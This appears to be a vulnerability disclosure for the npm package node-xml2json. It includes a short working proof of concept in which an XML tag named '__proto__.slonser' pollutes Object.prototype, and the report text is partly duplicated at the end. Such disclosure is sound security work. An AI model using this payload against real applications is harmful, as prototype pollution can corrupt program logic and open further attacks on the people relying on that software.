Hello, I found a vulnerability in your package, the thing is that there is no encoding of dot symbol, so it is possible to rewrite the prototype of the object.
Steps to reproduce:
- Install you package from npm
- write into code file smth like:
var xml2json = require("node-xml2json");
var xml = '<__proto__.slonser>pwned</__proto__>';
var json = xml2json.parser(xml);
var a = {}
console.log(a.slonser)
- Result: pwned
Hello, I found a vulnerability in your package, the thing is that there is no encoding of dot symbol, so it is possible to rewrite the prototype of the object.
Steps to reproduce: